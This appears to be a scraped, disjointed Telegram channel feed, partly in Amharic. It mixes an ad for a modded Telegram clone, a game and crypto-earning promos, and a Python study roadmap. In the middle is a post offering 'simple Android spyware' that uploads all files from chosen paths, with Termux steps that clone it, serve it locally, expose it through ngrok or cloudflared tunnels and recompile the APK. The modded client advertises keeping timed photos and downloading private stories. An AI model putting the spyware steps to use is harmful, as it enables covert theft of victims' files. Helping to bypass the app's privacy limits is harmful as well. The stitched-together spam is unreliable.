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ሁሉንም ቻናሎች ተቀላቀሉ!


📱Telegram📱 premium M0d + Extra Feature's (Clone)🔟

Updated version

✅Package name: org.telegram.messenger.jud

✅Version Code:56159

❏ Mod info : READ IT PLEASE⚠️

◉ Server-side features (emojis,stickers) not working

◉ Sponsored Post/Messages removed

◉ Download speed much faster than ever 🔥🔥🔥

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✅ከPrivate Channel Message Copy እና Forward ማድረግ ይችላሉ(But fake forward Copy ማድረግ ይችላሉ)

✅በ Timer⌛️ሚላክ ፎቶ መቼም አይጠፋም

⚡️Speed boost ሁኗል⚡️

✅Sponsor Ads are Removed
● Additional new features 🔥

- ከ የትኛውም Private Story ላይ Photo,Video.... Download ማድረግ ትችላላችሁ።

• Doubled Limits ✅
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.A photo sent with Timer⌛️ will never be deleted.
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• Animated Emoji's (Client Side Only) ✅
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• Premium Stickers ❌

⚡️በተጨማሪም Clone Version ስለሆነ ኦርጅናል ቴሌግራም መደለት አይጠበቅባችሁም📱

➤ Mod, Extra Feature's.

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👩‍💻 @termuxxxtoools👨‍💻

You are player of Clash of Clans ⚔️!
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Simple Android spyware that uploads all files from user selected paths.

pkg update && pkg upgrade -y
pkg install git pv unzip -y
git clone
cd Spim3/

Example usage:

- open new session
cd Files/
php -S > /dev/null 2>&1 &

- Tunnel using cloudflared
cloudflared tunnel --url

- Tunnel using ngrok
ngrok http 8080

- on main session:


- Enter the url from ngrok/cloudflare.
- Enter paths, if done then Enter done.
- Compile /sdcard/Spim3/decompiled Using apktool_M
⚠️Termux tools are for educational use only.

💰Play FOXCOIN and earn cash for free! 🤑

🎁I’ve already withdrawn—don’t miss out! 💵

Video is unavailable for watching
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Learn New Skills FREE:

1. HTML ➝

2. CSS ➝

3. JavaScript ➝

4. React ➝

5. Tailwind CSS ➝

6. Vue  ➝

7. Python ➝

8. SQL ➝

9. Git and GitHub ➝

10. Blockchain ➝

11. Mongo DB ➝

12. Node JS ➝

➡️ Give Reactions 🙌

Python Learning Plan in 2024

|-- Week 1: Introduction to Python
|   |-- Python Basics
|   |   |-- What is Python?
|   |   |-- Installing Python
|   |   |-- Introduction to IDEs (Jupyter, VS Code)
|   |-- Setting up Python Environment
|   |   |-- Anaconda Setup
|   |   |-- Virtual Environments
|   |   |-- Basic Syntax and Data Types
|   |-- First Python Program
|   |   |-- Writing and Running Python Scripts
|   |   |-- Basic Input/Output
|   |   |-- Simple Calculations
|-- Week 2: Core Python Concepts
|   |-- Control Structures
|   |   |-- Conditional Statements (if, elif, else)
|   |   |-- Loops (for, while)
|   |   |-- Comprehensions
|   |-- Functions
|   |   |-- Defining Functions
|   |   |-- Function Arguments and Return Values
|   |   |-- Lambda Functions
|   |-- Modules and Packages
|   |   |-- Importing Modules
|   |   |-- Standard Library Overview
|   |   |-- Creating and Using Packages
|-- Week 3: Advanced Python Concepts
|   |-- Data Structures
|   |   |-- Lists, Tuples, and Sets
|   |   |-- Dictionaries
|   |   |-- Collections Module
|   |-- File Handling
|   |   |-- Reading and Writing Files
|   |   |-- Working with CSV and JSON
|   |   |-- Context Managers
|   |-- Error Handling
|   |   |-- Exceptions
|   |   |-- Try, Except, Finally
|   |   |-- Custom Exceptions
|-- Week 4: Object-Oriented Programming
|   |-- OOP Basics
|   |   |-- Classes and Objects
|   |   |-- Attributes and Methods
|   |   |-- Inheritance
|   |-- Advanced OOP
|   |   |-- Polymorphism
|   |   |-- Encapsulation
|   |   |-- Magic Methods and Operator Overloading
|   |-- Design Patterns
|   |   |-- Singleton
|   |   |-- Factory
|   |   |-- Observer
|-- Week 5: Python for Data Analysis
|   |-- NumPy
|   |   |-- Arrays and Vectorization
|   |   |-- Indexing and Slicing
|   |   |-- Mathematical Operations
|   |-- Pandas
|   |   |-- DataFrames and Series
|   |   |-- Data Cleaning and Manipulation
|   |   |-- Merging and Joining Data
|   |-- Matplotlib and Seaborn
|   |   |-- Basic Plotting
|   |   |-- Advanced Visualizations
|   |   |-- Customizing Plots
|-- Week 6-8: Specialized Python Libraries
|   |-- Web Development
|   |   |-- Flask Basics
|   |   |-- Django Basics
|   |-- Data Science and Machine Learning
|   |   |-- Scikit-Learn
|   |   |-- TensorFlow and Keras
|   |-- Automation and Scripting
|   |   |-- Automating Tasks with Python
|   |   |-- Web Scraping with BeautifulSoup and Scrapy
|   |-- APIs and RESTful Services
|   |   |-- Working with REST APIs
|   |   |-- Building APIs with Flask/Django
|-- Week 9-11: Real-world Applications and Projects
|   |-- Capstone Project
|   |   |-- Project Planning
|   |   |-- Data Collection and Preparation
|   |   |-- Building and Optimizing Models
|   |   |-- Creating and Publishing Reports
|   |-- Case Studies
|   |   |-- Business Use Cases
|   |   |-- Industry-specific Solutions
|   |-- Integration with Other Tools
|   |   |-- Python and SQL
|   |   |-- Python and Excel
|   |   |-- Python and Power BI
|-- Week 12: Post-Project Learning
|   |-- Python for Automation
|   |   |-- Automating Daily Tasks
|   |   |-- Scripting with Python
|   |-- Advanced Python Topics
|   |   |-- Asyncio and Concurrency
|   |   |-- Advanced Data Structures
|   |-- Continuing Education
|   |   |-- Advanced Python Techniques
|   |   |-- Community and Forums
|   |   |-- Keeping Up with Updates
|-- Resources community
|   |-- Online Courses (Coursera, edX, Udemy)
|   |-- Books (Automate the Boring Stuff, Python Crash Course)
|   |-- Python Blogs and Podcasts
|   |-- GitHub Repositories
|   |-- Python community (Reddit, Stack Overflow)

Here you can find essential Python Interview Resources👇

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